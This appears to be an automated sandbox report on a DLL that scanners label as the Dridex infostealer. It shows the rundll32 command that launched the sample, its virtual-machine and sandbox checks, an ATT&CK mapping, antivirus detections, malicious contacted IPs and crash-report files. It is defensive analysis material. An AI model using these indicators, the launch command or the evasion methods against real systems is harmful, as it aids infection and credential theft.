Source: Amcache.hve.12.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.12.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
Source: WerFault.exe, 0000000C.00000003.345578429.00000000049C6000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.12.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ED86D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6ED86D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ED93138 RtlAddVectoredExceptionHandler,

0_2_6ED93138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.624963934.0000000001290000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.313950124.0000000002CB0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.316555355.0000000002CB0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.312651785.0000000003130000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.309615939.0000000003130000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.624963934.0000000001290000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.313950124.0000000002CB0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.316555355.0000000002CB0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.312651785.0000000003130000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.309615939.0000000003130000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.624963934.0000000001290000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.313950124.0000000002CB0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.316555355.0000000002CB0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.312651785.0000000003130000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.309615939.0000000003130000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.624963934.0000000001290000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.313950124.0000000002CB0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.316555355.0000000002CB0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.312651785.0000000003130000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.309615939.0000000003130000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: loaddll32.exe, 00000000.00000002.624963934.0000000001290000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.313950124.0000000002CB0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.316555355.0000000002CB0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.312651785.0000000003130000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.309615939.0000000003130000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6ED86D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

0_2_6ED86D0C

Source: Amcache.hve.12.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	DLL Side-Loading1	Process Injection12	Virtualization/Sandbox Evasion1	OS Credential Dumping	Security Software Discovery21	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Process Injection12	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
hMUh2Mkqyi.dll	64%	Virustotal		Browse
hMUh2Mkqyi.dll	67%	ReversingLabs	Win32.Infostealer.Dridex
hMUh2Mkqyi.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.0.rundll32.exe.540000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.rundll32.exe.6ed80000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.2.rundll32.exe.a40000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.rundll32.exe.540000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.rundll32.exe.6ed80000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.0.rundll32.exe.6ed80000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.2.loaddll32.exe.ac0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.rundll32.exe.540000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.rundll32.exe.a40000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.loaddll32.exe.6ed80000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.0.rundll32.exe.6ed80000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.0.rundll32.exe.a40000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.rundll32.exe.6ed80000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.12.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
162.241.33.132	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
104.36.167.47	unknown	United States	27640	GIGASNET-ASUS	true
217.160.5.104	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
188.40.48.93	unknown	Germany	24940	HETZNER-ASDE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	545441
Start date:	26.12.2021
Start time:	17:17:04
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	hMUh2Mkqyi.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.evad.winDLL@9/10@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 54.4% (good quality ratio 51.5%) Quality average: 78% Quality standard deviation: 28.5%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.42.73.29 Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
162.241.33.132	E972ciDmtE.dll	Get hash	malicious	Browse
	E972ciDmtE.dll	Get hash	malicious	Browse
	4NEHGDB2q7.dll	Get hash	malicious	Browse
	4NEHGDB2q7.dll	Get hash	malicious	Browse
	ReMxcvxKeOzodickpenis.dll	Get hash	malicious	Browse
	ReMxcvxKeOzodickpenis.dll	Get hash	malicious	Browse
	UzgDinGRAz.dll	Get hash	malicious	Browse
	nr29dWSsgF.dll	Get hash	malicious	Browse
	UzgDinGRAz.dll	Get hash	malicious	Browse
	nr29dWSsgF.dll	Get hash	malicious	Browse
	OQjpM0PPCp.dll	Get hash	malicious	Browse
	zNMgAlNt7a.dll	Get hash	malicious	Browse
	OQjpM0PPCp.dll	Get hash	malicious	Browse
	zNMgAlNt7a.dll	Get hash	malicious	Browse
	VowAWbKvhX.dll	Get hash	malicious	Browse
	ZXD1iYQeIh.dll	Get hash	malicious	Browse
	LJj7wnqI9A.dll	Get hash	malicious	Browse
	VowAWbKvhX.dll	Get hash	malicious	Browse
	ZXD1iYQeIh.dll	Get hash	malicious	Browse
104.36.167.47	hMUh2Mkqyi.dll	Get hash	malicious	Browse
	E972ciDmtE.dll	Get hash	malicious	Browse
	E972ciDmtE.dll	Get hash	malicious	Browse
	4NEHGDB2q7.dll	Get hash	malicious	Browse
	4NEHGDB2q7.dll	Get hash	malicious	Browse
	ReMxcvxKeOzodickpenis.dll	Get hash	malicious	Browse
	ReMxcvxKeOzodickpenis.dll	Get hash	malicious	Browse
	UzgDinGRAz.dll	Get hash	malicious	Browse
	nr29dWSsgF.dll	Get hash	malicious	Browse
	UzgDinGRAz.dll	Get hash	malicious	Browse
	nr29dWSsgF.dll	Get hash	malicious	Browse
	OQjpM0PPCp.dll	Get hash	malicious	Browse
	zNMgAlNt7a.dll	Get hash	malicious	Browse
	OQjpM0PPCp.dll	Get hash	malicious	Browse
	zNMgAlNt7a.dll	Get hash	malicious	Browse
	VowAWbKvhX.dll	Get hash	malicious	Browse
	ZXD1iYQeIh.dll	Get hash	malicious	Browse
	LJj7wnqI9A.dll	Get hash	malicious	Browse
	VowAWbKvhX.dll	Get hash	malicious	Browse
	ZXD1iYQeIh.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UNIFIEDLAYER-AS-1US	hMUh2Mkqyi.dll	Get hash	malicious	Browse	162.241.33.132
	QmRD3TL34p	Get hash	malicious	Browse	98.131.204.234
	QiZ1RADVGt.xls	Get hash	malicious	Browse	192.185.6.31
	Aw8F7Ua3w7.xls	Get hash	malicious	Browse	192.185.6.31
	dSeuQsymrQ.exe	Get hash	malicious	Browse	216.172.160.230
	1WaWsMTrjt.exe	Get hash	malicious	Browse	216.172.160.230
	POWKlAddNj.exe	Get hash	malicious	Browse	216.172.160.230
	wJb8YRaQ9Y.xls	Get hash	malicious	Browse	192.185.6.31
	LcTYOSCFws.exe	Get hash	malicious	Browse	216.172.160.230
	8LuKQEfuX9.exe	Get hash	malicious	Browse	192.185.5.67
	MZf48VAxT7.exe	Get hash	malicious	Browse	216.172.160.230
	iOXn4DA38y.xls	Get hash	malicious	Browse	192.185.6.31
	wxSfUTFXM3.xls	Get hash	malicious	Browse	192.185.6.31
	GsWdBjZeXt.exe	Get hash	malicious	Browse	216.172.160.230
	HvM9U2PXj8	Get hash	malicious	Browse	76.163.41.198
	rAFAiRUA1V.dll	Get hash	malicious	Browse	162.214.50.39
	J25211072U.xls	Get hash	malicious	Browse	192.185.6.31
	P8350890482154705486T.xls	Get hash	malicious	Browse	192.185.6.31
	95638203769706269.xls	Get hash	malicious	Browse	192.185.6.31
	051245051373252633P.xls	Get hash	malicious	Browse	192.185.6.31
GIGASNET-ASUS	hMUh2Mkqyi.dll	Get hash	malicious	Browse	104.36.167.47
	E972ciDmtE.dll	Get hash	malicious	Browse	104.36.167.47
	E972ciDmtE.dll	Get hash	malicious	Browse	104.36.167.47
	4NEHGDB2q7.dll	Get hash	malicious	Browse	104.36.167.47
	4NEHGDB2q7.dll	Get hash	malicious	Browse	104.36.167.47
	ReMxcvxKeOzodickpenis.dll	Get hash	malicious	Browse	104.36.167.47
	ReMxcvxKeOzodickpenis.dll	Get hash	malicious	Browse	104.36.167.47
	UzgDinGRAz.dll	Get hash	malicious	Browse	104.36.167.47
	nr29dWSsgF.dll	Get hash	malicious	Browse	104.36.167.47
	UzgDinGRAz.dll	Get hash	malicious	Browse	104.36.167.47
	nr29dWSsgF.dll	Get hash	malicious	Browse	104.36.167.47
	OQjpM0PPCp.dll	Get hash	malicious	Browse	104.36.167.47
	zNMgAlNt7a.dll	Get hash	malicious	Browse	104.36.167.47
	OQjpM0PPCp.dll	Get hash	malicious	Browse	104.36.167.47
	zNMgAlNt7a.dll	Get hash	malicious	Browse	104.36.167.47
	VowAWbKvhX.dll	Get hash	malicious	Browse	104.36.167.47
	ZXD1iYQeIh.dll	Get hash	malicious	Browse	104.36.167.47
	LJj7wnqI9A.dll	Get hash	malicious	Browse	104.36.167.47
	VowAWbKvhX.dll	Get hash	malicious	Browse	104.36.167.47
	ZXD1iYQeIh.dll	Get hash	malicious	Browse	104.36.167.47

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_38e29c13fccc57cc8ef8dd241186e366303ea06f_82810a17_176e2544\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9656747716480318
Encrypted:	false
SSDEEP:	192:db/iT0oXPCHBUZMX4jed+1U/u7sZS274ItWc:dziNXSBUZMX4jeD/u7sZX4ItWc
MD5:	55669D8210478B4EA8323FF6EB534C13
SHA1:	7BCB3FCBA3249AC0664BE549FD2432E9B5086AAB
SHA-256:	CD49E5A8B39323E717F3AFB244C81F8721E8678ED49CB835D80B664855E49BE7
SHA-512:	D215A9C5F663D7E9738D195985E7DFB90145B665803B6E3778748970866D22D0135D159CFD52CE203B4F3008A51406584D397FE7B62C7E64481B7A2FE1DA5242
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.5.0.4.1.5.1.8.7.3.2.4.9.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.5.0.4.1.5.2.9.4.3.5.5.8.7.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.b.d.f.7.d.c.-.e.b.3.f.-.4.c.2.7.-.8.9.2.3.-.c.0.f.9.e.9.3.d.f.0.2.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.4.9.0.b.6.e.-.f.b.a.8.-.4.f.5.2.-.b.1.6.5.-.2.7.8.b.6.6.c.0.2.8.8.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.1.4.-.0.0.0.1.-.0.0.1.6.-.8.1.2.5.-.2.2.9.3.b.f.f.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_ea735312adf69f22b427e19aa51f4ce6a1d_82810a17_171a2091\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9996355450018282
Encrypted:	false
SSDEEP:	192:Csiq0oXBHVzOMjed+18/u7sZS274It7c:Csi8XRVzOMjez/u7sZX4It7c
MD5:	216CC294D0F05DB284EF1FFBE92D55B6
SHA1:	3717F28673DF0F8F98B5A560A59AB4D675A67F54
SHA-256:	1DB84B869558BE37C209AAA1F2FBBC26C0E355E5F715BA8F53E7E9AF03D593C1
SHA-512:	CECED3C45916CF7C3F0F575A4F7F52A0B5F5A591596746F17477F3F4F141010E2D5BED408E672EB27D7F1AC92F5EF31145FECA4B900214C3C9D66597357B04FF
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.5.0.4.1.5.2.0.2.8.0.6.4.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.2.0.7.b.2.8.-.4.5.d.f.-.4.2.9.6.-.8.d.8.3.-.6.4.d.d.5.b.c.4.3.a.c.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.7.e.4.b.9.1.-.0.1.8.1.-.4.a.2.d.-.a.e.9.e.-.8.a.d.6.7.f.2.d.e.7.3.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.8.c.-.0.0.0.1.-.0.0.1.6.-.3.9.2.2.-.1.f.9.3.b.f.f.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.u.n.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.8.6././.0.1././.3.0.:.1.1.:.4.2.:.4.4.!.1.0.3.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1855.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4731
Entropy (8bit):	4.446756882022546
Encrypted:	false
SSDEEP:	48:cvIwSD8zs58JgtWI9+wWSC8Bh8fm8M4JCdssBb7FW7+q8vjssBb04SrS8d:uITf4JJSNMJe27KriDW8d
MD5:	0F081340957DBDE7A6808F4A861E1D20
SHA1:	960A9C5F321005769B3DE1C265B9EDBF18985E37
SHA-256:	478ACB3B3B003ED17F8A5F7E27A57ACD1FC82AAF2123DAE0B77A5F857778D7D7
SHA-512:	90890CC1B6926911C52EB0EF4C9509A6AC0F9EBE3FB9EB02CC7900F85EE9BD6E3F5AABF6F0D86CBC1085527A9C69D7DBD5E0AC1B08FA293B4D14B687888E4472
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1315349" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER347.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	4.463217480064392
Encrypted:	false
SSDEEP:	48:cvIwSD8zs58JgtWI9+wWSC8B+8fm8M4JCdssBbDFh+q8/NBfnr4SrS9d:uITf4JJSNtJeRO1DW9d
MD5:	325FE2F0F50A9BAF96A6860820CD3839
SHA1:	A15025F2DF4A768FA5E6F77E89644130CC2E1BDA
SHA-256:	28A9ACA89DC97F41244D4C6F850164F12D9C2923DF7A46F5FCB8A3C589656AD1
SHA-512:	A5F958EB415118A695F50090121EC7D52C7102D5CA64341BD9A6DCDC160D5D08B25C6405BFF7A36AA765CFA1BA5890B0250E69460311CEF357F65CD1FE1557B5
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1315349" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA1C.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8350
Entropy (8bit):	3.6881137390764036
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi3a626Y7d68mWGgmf8ZSxCpBo89b/Psfq1m:RrlsNiK626YR6Vgmf8ZSu/0fR
MD5:	259806BFC7BE7B1D29FDB76EF7BDC1F9
SHA1:	55370FC1A49B9497FB3DF0837CAC4BCFF57C4D92
SHA-256:	ED1613B97A23789927B47EB97F975FBCFA6B933F222552EC79B57275C02C383E
SHA-512:	93380DAAABFA41FE47A882AF91334843510863AC3F6441B6110A0CEE45A01E295802923B9AC583DE42767E89D5E77EE825702E864941CEB4A190E096B1ACF1FA
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.8.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF56A.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Dec 27 01:18:40 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	46842
Entropy (8bit):	2.123772277205567
Encrypted:	false
SSDEEP:	384:dfMdu9JX5Lbi4ynchkWuF9QNHMdBWO+T:rJXVbCnMXurANrT
MD5:	638DAF866B7BCE9C14131A08B8986E6A
